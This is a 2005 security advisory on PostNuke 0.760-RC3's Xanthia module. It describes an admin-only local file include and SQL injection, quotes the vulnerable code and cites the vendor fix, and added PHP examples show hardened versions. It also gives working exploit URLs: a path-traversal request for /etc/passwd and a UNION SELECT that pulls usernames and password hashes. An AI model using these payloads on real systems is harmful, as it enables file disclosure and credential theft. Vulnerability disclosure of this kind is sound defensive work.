postnukeSQL0760rc3.txt

2005-08-14T00:00:00
ID PACKETSTORM:39293
Type packetstorm
Reporter Maksymilian Arciemowicz
Modified 2005-08-14T00:00:00

Description

  
[PostNuke Non Critical SQL Injection and Include 0.760-RC3=>x cXIb8O3.10]  
  
Author: cXIb8O3(Maksymilian Arciemowicz)  
Date: 2.4.2005  
from securityreason.com TEAM  
  
--- 0. Description ---
  
PostNuke: The Phoenix Release (0.760-RC3=>X)  
  
PostNuke is an open source, open development content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development, but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage  
at http://noc.postnuke.com/  
You can also visit us on our IRC Server irc.postnuke.com channel  
#postnuke-support  
#postnuke-chat  
#postnuke  
Or at the Community Forums located at:  
http://forums.postnuke.com/  
  
  
--- 1. Non Critical Local files include ---
This flaw exists in modules/Xanthia/pnadminapi.php. If PHP is badly configured and you have admin rights, you can read any file on the server.
  
For example:
  
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=addTheme&authid=&skin=cXIb8O3  
etc.  
  
Error message:
---------------
/www/PostNuke-0.750/source/html/modules/Xanthia/pnadminapi.php on line 1053
---------------
  
or  
  
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=credits&skin=[FILE]  
  
but you can pass a path to a different file in the skin variable. Example for /etc/passwd:
  
http://[HOST]/[DIR]/source/html/index.php?module=Xanthia&type=admin&func=addTheme&authid=&skin=../../../../../../../../etc/passwd%00  
  
  
Vulnerability code in modules/Xanthia/pnadminapi.php:  
  
---1039-1052---
// $id is the theme name taken from the request (the skin parameter) and is
// used in the include paths without validation.
$cWhereIsPerso = WHERE_IS_PERSO;
if (!(empty($cWhereIsPerso))) {
    $xaninitlang_path = $cWhereIsPerso . 'themes/'.$id.'/lang/'.$langs.'/xaninit.php';
    $xaninit_path = $cWhereIsPerso . 'themes/'.$id.'/xaninit.php';
}
else {
    $xaninitlang_path = 'themes/'.$id.'/lang/'.$langs.'/xaninit.php';
    $xaninit_path = 'themes/'.$id.'/xaninit.php';
}
if (file_exists($xaninitlang_path)) {
    include_once($xaninitlang_path);
}

include_once($xaninit_path);
---1039-1052---
etc.  
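As an added illustration (not PostNuke's code), here is a hardened version of the theme-path construction above: the theme id (the skin parameter in the requests above) is matched against the directories actually installed under themes/ before any path is built, so traversal sequences and null bytes never reach include_once. WHERE_IS_PERSO and the themes/ layout come from the excerpt; the function names, the default language code and the sample inputs are assumptions made for this example.

```php
<?php
// Added example, not PostNuke code: the theme id (the "skin" request parameter
// above) is matched against the directories actually installed under themes/
// before any path is built, so traversal and null bytes never reach include_once.

define('WHERE_IS_PERSO', '');   // constructed stand-in for PostNuke's constant

// Installed theme names: the plain directory names under $themesRoot.
function xanthia_installed_themes($themesRoot)
{
    $dirs = glob(rtrim($themesRoot, '/') . '/*', GLOB_ONLYDIR);
    return $dirs === false ? array() : array_map('basename', $dirs);
}

// Paths to the theme's xaninit files, or null when $id is not an installed theme.
function xanthia_theme_init_paths($id, $langs, $themesRoot)
{
    // Theme names are plain identifiers; anything else (including "../" or "\0") fails.
    if (!is_string($id) || !preg_match('/^[A-Za-z0-9_-]+$/', $id)) {
        return null;
    }
    // Allowlist: the id must be exactly one of the installed directory names.
    if (!in_array($id, xanthia_installed_themes($themesRoot), true)) {
        return null;
    }
    if (!is_string($langs) || !preg_match('/^[a-z]{2,3}$/', $langs)) {
        $langs = 'eng';     // assumed default language code
    }
    $base = $themesRoot . $id . '/';
    return array('lang' => $base . 'lang/' . $langs . '/xaninit.php',
                 'init' => $base . 'xaninit.php');
}

$themesRoot = WHERE_IS_PERSO . 'themes/';
// Constructed inputs: a plausible theme name plus the two payloads from the advisory.
foreach (array('PiterpanV2', 'cXIb8O3', "../../../../../../../../etc/passwd\0") as $skin) {
    $paths = xanthia_theme_init_paths($skin, 'eng', $themesRoot);
    if ($paths === null) {
        echo 'rejected: ' . addcslashes($skin, "\0..\37") . "\n";
        continue;
    }
    if (file_exists($paths['lang'])) {
        include_once($paths['lang']);
    }
    include_once($paths['init']);
}
```

Run from a directory without a themes/ folder, all three inputs are rejected; with a real themes/PiterpanV2/ directory only that name passes the allowlist.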
  
--- 2. Non critical Sql Injection ---
This SQL injection is non-critical because it works only with admin rights.
  
---1655-1676---
// $dati[0] comes from the request (riga[0]) and is interpolated into the query.
$sql="SELECT $column[module] as module,
    $column[block] as block,
    $column[position] as position
    FROM $pntable[theme_blcontrol]
    WHERE $column[position]='$dati[0]'
    ORDER BY $column[module]";

$result =& $dbconn->Execute($sql);
if(!$result->EOF) {
    // Create output object - this object will store all of our output so that
    // we can return it easily when required
    $pnRender =& new pnRender('Xanthia');

    // As Admin output changes often, we do not want caching.
    $pnRender->caching = false;

    $pnRender->assign('menu', pnModFunc('Xanthia','admin','thememenu'));
    $pnRender->assign('warn', _XA_NZWARNING);
    $pnRender->assign('columnheaders', array(pnVarPrepForDisplay(_XA_MODULE),
        pnVarPrepForDisplay(_XA_BLOCK)));
    while(!$result->EOF) {
        $row = $result->GetRowAssoc(false);
---1655-1676---
  
So a successful attack first requires logging in as a PostNuke administrator.
As administrator, we can then go to:
  
Example:  
  
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=8&riga[0]='cXIb8O3&riga[1]=and&riga[2]=sp3x&skin=PiterpanV2  
  
Error message:
---------------
Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/html/modules/Xanthia/pnadmin.php on line 1676
---------------
  
Exploit for admin:  
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=1&riga[0]='%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass%20FROM%20pn__users%20WHERE%20pn_uid=2/*  
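As an added example (not PostNuke's code), the block-control query from the excerpt is shown in its vulnerable form beside a version that validates the position value and binds it as a parameter. It assumes $dbconn is an ADOdb connection whose Execute() accepts an array of values for "?" placeholders; the $column and $pntable contents, the sample position 'left' and the function names are constructed for this example.

```php
<?php
// Added example, not PostNuke code: the block-control query from the excerpt with
// the position value bound as a parameter instead of interpolated into the SQL.
// Assumes $dbconn is an ADOdb connection, whose Execute() takes an array of
// values for "?" placeholders (an assumption about PostNuke's database layer).

// Constructed stand-ins for PostNuke's $column / $pntable configuration arrays.
$column  = array('module' => 'pn_module', 'block' => 'pn_block', 'position' => 'pn_position');
$pntable = array('theme_blcontrol' => 'pn_theme_blcontrol');

// Vulnerable form from the advisory: $dati[0] (request-controlled via riga[0])
// is dropped inside the quotes unescaped, so a leading quote ends the literal.
function blcontrol_query_vulnerable($column, $pntable, $dati)
{
    return "SELECT $column[module] as module, $column[block] as block, $column[position] as position
            FROM $pntable[theme_blcontrol]
            WHERE $column[position]='$dati[0]'
            ORDER BY $column[module]";
}

// Hardened form: identifiers still come from trusted config; the value is
// validated and handed to the driver separately. Returns array($sql, $params).
function blcontrol_query_safe($column, $pntable, $dati)
{
    $position = isset($dati[0]) ? $dati[0] : '';
    // Block positions are short identifiers; arrays and quote characters fail here.
    if (!is_string($position) || !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $position)) {
        throw new InvalidArgumentException('invalid block position');
    }
    $sql = "SELECT $column[module] as module, $column[block] as block, $column[position] as position
            FROM $pntable[theme_blcontrol]
            WHERE $column[position]=?
            ORDER BY $column[module]";
    return array($sql, array($position));
}

// Constructed inputs: a legitimate position and the quote probe from the advisory.
foreach (array(array('left'), array("'cXIb8O3")) as $dati) {
    echo blcontrol_query_vulnerable($column, $pntable, $dati) . "\n";
    try {
        list($sql, $params) = blcontrol_query_safe($column, $pntable, $dati);
        echo "bound: $sql / params: " . implode(',', $params) . "\n";
        // $result = $dbconn->Execute($sql, $params);   // with a live ADOdb $dbconn
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ' . $e->getMessage() . "\n";
    }
}
```

The vulnerable output for the second input shows the quote closing the literal early; the hardened function rejects it before any SQL is built, and a legitimate value is only ever passed to the driver as a bound parameter.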
  
--- 3. How to fix ---
PNSA 2005-2  
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)  
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html  
SHA1: 6e76d92124c833618d02dfdb87d699374120967d  
MD5: a007e741be11389a986b1d8928a6c0e5  
Size: 160550 Bytes  
  
or CVS  
  
--- 4. Greets ---
  
sp3x  
  
--- 5. Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >  
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com  
GPG-KEY: securityreason.com TEAM  